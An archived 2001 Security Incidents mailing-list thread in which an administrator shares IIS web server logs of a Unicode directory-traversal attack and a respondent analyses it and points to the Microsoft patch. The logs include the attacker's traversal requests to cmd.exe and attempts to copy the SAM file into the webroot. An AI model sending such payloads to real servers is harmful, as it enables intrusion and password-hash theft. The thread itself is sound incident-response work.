Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Security Incidents: Re: IIS Unicode attack decode

Re: IIS Unicode attack decode

From: Portnoy, Gary <gportnoy_at_BELENOSINC.COM>
Date: Tue, 20 Mar 2001 12:57:15 -0500

Robert,

This indeed is the IIS Unicode exploit. Looks like an automatic tool based
on the quick succession of the requests initially, but then they slow down,
and the attacker has to stop and think, as things don't go exactly as he
planned. Notice that some GET's returned the code of 200, meaning he was
able to successfully obtain the directory structure of your c and d drives,
as well as c:\winnt and some others. You also have an executable _vti_bin
directory which signifies to the attacker that you have FrontPage installed.
He could exploit some FrontPage vulnerabilities. You are right, he wasn't
able to obtain sam._ from the repair directory due to permissions, but from
what it looks like your webroot is on c drive, so he/she can now run any
executable in winnt directory, unless IUSR_computername is denied access to
them. That's all they need to turn your computer into a warez site as was
detailed in postings by Ron Grove from 2/24/01 to the incidents list. That
generated quite a discussion, so check it out...

You probably need to load MS patch Q277873
http://www.microsoft.com/technet/security/bulletin/MS00-086.asp

-Gary-

Gary Portnoy
Network Administrator
gportnoy_at_belenosinc.com

PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C

> -----Original Message-----
> From: ROBERT DEMAIN [mailto:rdemain_at_RM.COM]
> Sent: Tuesday, March 20, 2001 9:56 AM
> To: INCIDENTS_at_SECURITYFOCUS.COM
> Subject: IIS Unicode attack decode
>
>
> Hello All,
>
> Recently i've been seeing quite a few attempts from the same
> russian IP
> trying to send unicode commands to a web server. These
> attacks were picked
> up by an IDS. Below are extracts from the log file on the
> web server (see
> below)
>
> My understanding of what has happened here is as follows:
> -attacker tries a few attempts at doing a dir listing of c: and d:
> -attacker tries to copy important stuff from the \repair directory to
> c:\inetpub\wwwroot (most unfriendly)
> -attacker tries to copy bitmap (Blue%20Lace%2016.bmp) - not
> sure what this
> is about
>
> Putting it all together it seems the attacker tried to use
> the iis4 and 5
> unicode exploit to copy the sam file to a place where
> he/she/it thought they
> could get it from (on this server c:\inetpub\wwwroot is not
> the default web
> site or anything, but i believe it is on a default iis install). This
> failed for two main reasons; 1. the iusr_servername account
> (which is the
> user account this exploit can run as - correct me if i'm
> wrong) does not
> have permissions on \repair 2. the copy of the file to
> c:\inetpub\wwwroot
> would also fail as iusr_servername would not have the rights.
>
> Anyone have any comments on this? Anyone else seen activity
> like this?
>
> Regards
>
> Rob
>
>
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD
> /Default.htm -
> 200 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\winnt\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\winnt\repair\
> 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\Inetpub\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\Inetpub\AdminScripts\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\Inetpub\wwwroot\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
>
>
> Standard Disclaimer: This message is confidential. You
> should not copy it
> or disclose its contents to anyone. You may use and apply
> the information
> only for the intended purpose. Internet communications are
> not secure and
> therefore RM does not accept legal responsibility for the
> contents of this
> message. Any views or opinions presented are only those of
> the author and
> not those of RM. If this email has come to you in error
> please delete it
> and any attachments. Please note that RM may intercept incoming and
> outgoing e-mail communications.
>
Received on Mar 20 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]